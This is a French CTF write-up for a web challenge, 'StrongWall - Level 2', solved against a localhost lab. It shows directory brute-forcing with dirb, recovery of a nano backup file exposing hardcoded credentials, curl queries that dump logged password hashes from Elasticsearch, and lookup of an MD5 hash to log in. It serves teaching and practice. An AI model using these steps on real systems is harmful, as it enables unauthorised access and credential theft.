
# StrongWall - Level 2
 

 
 ## Informations sur le challenge
 
 
 <table>
 <tr>
     <td>Nom de l'épreuve</td>
     <td>StrongWall - Level 2</td>
 </tr>
 <tr>
     <td>Créateur</td>
     <td>RavenXploit (Romain ORTEGA)</td>
 </tr>   
 <tr>
     <td>Niveau de l'épreuve</td>
     <td>2/3</td>
 </tr>
 <tr>
     <td>Catégorie de l'épreuve</td>
     <td>Web</td>
 </tr>
 <tr>
     <td>Points attribués</td>
     <td>TODO</td>
 </tr>
 </table>
 
 
 ## Consignes :
 
 Ce challenge représente le second niveau, sur trois, du challenge StrongWall.
 Le niveau suivant ne peut-être débloqué tant que le précédent n'a pas été résolu.
 
 Dans ce deuxième niveau vous devez trouver une manière de vous authentifier sur l'application.
 Le flag est de la forme fl@g{}
 
 Bonne chance !
 

## Analyse

Nous allons dans un premier temps récupérer les informations liées au serveur, et au langage de programmation, grâce à Wappalyzer :

![wappalyzer](images/wappalyzer.png)

Nous avons ici à faire à du PHP, dans sa version 7.3.14, et le contenu est servit par un serveur Nginx en version nginx/1.16.1. 
Bien que des CVE existent sur ces versions, il ne semble pas y'avoir d'exploit intéressant dans la nature.

Essayons maintenant de trouver tous les fichiers qui pourraient être intéressants grâce à `dirb` : 


```bash
dirb http://localhost:8081/ /usr/share/dirb/wordlists/big.txt


-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Fri Feb 21 00:59:47 2020
URL_BASE: http://localhost:8081/
WORDLIST_FILES: /usr/share/dirb/wordlists/big.txt

-----------------

GENERATED WORDS: 20458                                                         

---- Scanning URL: http://localhost:8081/ ----
==> DIRECTORY: http://localhost:8081/css/                                      
==> DIRECTORY: http://localhost:8081/js/                                       
+ http://localhost:8081/releases (CODE:200|SIZE:593)                           
+ http://localhost:8081/robots.txt (CODE:200|SIZE:60)                          
==> DIRECTORY: http://localhost:8081/uploads/                                  
                                                                               
---- Entering directory: http://localhost:8081/css/ ----
                                                                               
---- Entering directory: http://localhost:8081/js/ ----
                                                                               
---- Entering directory: http://localhost:8081/uploads/ ----
                                                                               
-----------------
END_TIME: Fri Feb 21 01:00:44 2020
DOWNLOADED: 81832 - FOUND: 2

```

Nous trouvons un fichier robots.txt, analysons son contenu : 

```bash
echo "aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj1DR2ZLaTZrcGRUUQ==" | base64 -d
https://www.youtube.com/watch?v=CGfKi6kpdTQ
```

Nous tombons sur une vidéo youtube, il s'agit vraisemblablement d'un troll... Ou pas ? Gardons ça en mémoire pour plus tard et profitons de la musique ! 

![rock](images/rock.gif)

Dirb nous a également trouvé un fichier releases, jettons-y un oeil : 

```
Version 1 :
    La version initiale de StrongWall est enfin sortie !

Version 1.1 :
    Hot fix en production !
    L'équipe de pentest nous indique que la gestion des logs de connexions ne devrait pas se faire du côté client...
    On pensait vraiment que les logs communautaires étaient une bonne idée... :(
    Nous avons donc supprimé temporairement la fonctionnalité !
    Elle reviendra rapidement en backend...

Version 2.0 :

    En cours de développement ¯\_(*v*)_/¯

    A faire :
        Changer l'algorithme de hash...
        Rajouter la gestion des logs côté backend.
```

Nous avons là clairement un indice : le développeur a visiblement fait une modification en production directement, c'est à dire directement sur le serveur. 

Deux possibilités à creuser : 
* Il reste une trace d'une backup auto de l'éditeur
* Le développeur a fait une backup de son fichier 

Vérifions ceux-ci grâce à un petit script personnel (disponible dans ce repository) : 

```python
 python3 backup-finder.py http://localhost:8081/ login.php

The following(s) file(s) is/are found :
        http://localhost:8081/login.php~

```

Bingo nous avons un fichier de backup auto généré par nano. Recherchons le contenu intéressant :

```js
function utf8_to_b64( str ) {
        return window.btoa(unescape(encodeURIComponent( str )));
    }

    document.getElementById('login').onsubmit =  function () {

        let conf = JSON.parse(
            getCookie('conf').replace(/\\/g, "")
        );

        let pseudo = document.getElementById('pseudo').value;

        let password = document.getElementById('password').value;

        let xhr = new XMLHttpRequest();
        xhr.open("POST", conf.url, false);
        xhr.setRequestHeader("Content-type", "application/json");
        xhr.setRequestHeader("Authorization", "Basic " + btoa("strongwall:S3cur3P4ssw0rd"));
        let payload = {
            'date': Math.round(+new Date()/1000),
            'level' : 'INFO',
            'host': conf.client_ip,
            'operation' : 'AUTH',
            'message' : utf8_to_b64(pseudo + ':' + sec(password))
        };

        xhr.send(JSON.stringify(payload));

        document.getElementById('#loginform').submit();

        return false;
    };

```

Nous pouvons voir en fin de fichier la fameuse fonctionnalité d'envoi des logs côté client.
Nous avons ici l'envoi d'une requête POST. 

L'adresse IP du serveur cible est contenue au sein d'un cookie. Cette IP est également définie au sein du code php :

```php 
$url = 'http://9200:127.0.0.1/logs/_doc';
```

Pas de doute, on reconnait bien ici une URL qui fait penser à de l'Elasticsearch. Vérifions cela :


```bash
curl -u strongwall:S3cur3P4ssw0rd -X GET "localhost:9200/logs/_search/?pretty" -H 'Content-Type: application/json' -d'
{
  "query": { "match_all": {} }
} '

[ ... ]

 {
        "_index" : "logs",
        "_type" : "_doc",
        "_id" : "VygIZXABNCgwxw-cOfT9",
        "_score" : 1.0,
        "_source" : {
          "log_date" : 1581983789,
          "log_level" : "INFO",
          "host" : "222.174.255.133",
          "operation" : "AUTH",
          "message" : "cm9ibGVzOmVmNGNkZDMxMTc3OTNiOWZkNTkzZDc0ODg0MDk2MjZk"
        }
[ ... ]
```

Nous avons bien à faire à Elasticsearch.

Nous pouvons voir dans les résultats retournés un message en base64. Décodons celui-ci : 

```bash
echo "cm9ibGVzOmVmNGNkZDMxMTc3OTNiOWZkNTkzZDc0ODg0MDk2MjZk" | base64 -d
robles:ef4cdd3117793b9fd593d7488409626d%                                                     
```

Il semble que nous ayons récupéré un nom d'utilisateur et son mot de passe hashé en md5. 

Un rapide tour sur internet et nous découvrons que le hash "ef4cdd3117793b9fd593d7488409626d" correspond au mot de passe "harley".

Utilisons ces informations pour nous connecter : 

![auth](images/auth.png)

Vous n'avez rien vu passer ? 

Bienvenu.e en CTF ! Gardez toujours à minima votre console réseau ouverte avec la conservation du journal d'activé ;)
Le mieux étant d'utiliser un outil comme burp.

Une rediction automatique très rapide vous est passée sous le nez, nous pouvons voir dans les headers que le referer n'est pas login.php : 

```
GET /index.php HTTP/1.1
Host: localhost:8081
Connection: keep-alive
Upgrade-Insecure-Requests: 1
DNT: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36
Sec-Fetch-Dest: document
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Referer: http://localhost:8081/QhgxbWP0MayLuqXRUQ1gdbbzgL2SGeI5PTOBtZYYsC6QdzOYREhhV7CMNLwD2yIaRY0aiLw75JVylq6SD6LGxvgC3hjU3xdE3wzX.php
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9,fr-FR;q=0.8,fr;q=0.7
Cookie: conf=%7B%22url%22%3A%22http%3A%5C%2F%5C%2F127.0.0.1%3A9200%5C%2Flogs%5C%2F_doc%22%2C%22client_ip%22%3A%22172.20.0.1%22%7D; PHPSESSID=qj8vkjkuk2qndlj6v1nh59dlr3
```

Jetons un oeil à cette page en activant le mode proxy de burp : QhgxbWP0MayLuqXRUQ1gdbbzgL2SGeI5PTOBtZYYsC6QdzOYREhhV7CMNLwD2yIaRY0aiLw75JVylq6SD6LGxvgC3hjU3xdE3wzX.php


![flag](images/flag.png)

```
WP ! Voici le flag : fl@g{Cl13ntS1d3L0gsAndP5ssw0rd...R34lly?}
```

Nous avons le flag, GG WP ! 





